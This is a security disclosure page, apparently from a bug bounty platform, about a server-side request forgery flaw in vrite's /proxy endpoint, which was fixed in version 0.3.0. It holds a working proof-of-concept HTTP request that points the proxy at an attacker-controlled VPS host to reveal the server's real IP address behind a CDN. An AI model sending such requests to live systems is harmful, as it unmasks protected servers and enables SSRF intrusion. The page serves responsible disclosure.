SSRF vulnerability in the vrite in vriteio/vrite

Valid

Reported on

Sep 27th 2023


Description

This vulnerability can be used to leak remote server information, bypass CDN like cloudflare. Also it can be used to the SSRF attack.

Proof of Concept

Here we can use it to leak the real IP of the https://app.vrite.io.

GET /proxy?url=https://your-vps-ip.nip.io/ HTTP/2
Host: app.vrite.io
Origin: localhost
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.vrite.io/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Just send a GET request to the remote server. Adding Origin: localhost within the header. Set the proxy url parameter to your vps address. And you will receive a connection from the real vrite server.

Impact

Leak the real IP address of your website, and use it to do SSRF attack.

Occurrences

The proxy logic needs some modification

We are processing your report and will contact the vriteio/vrite team within 24 hours. 5 months ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 5 months ago
We have contacted a member of the vriteio/vrite team and are waiting to hear back 5 months ago
vriteio/vrite maintainer validated this vulnerability 5 months ago
l0kihardt has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Arek Nawo marked this as fixed in 0.3.0 with commit 187768 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago
app.ts#L54 has been validated
u32i
a month ago

Hi,

I was just in the process of requesting a CVE-ID and i found this report.

@areknawo I've reported this vulnerability before this researcher on Sep 2nd, 2023, along with another vulnerability, if you checked your email (security@vrite.io) you will find my report.

to join this conversation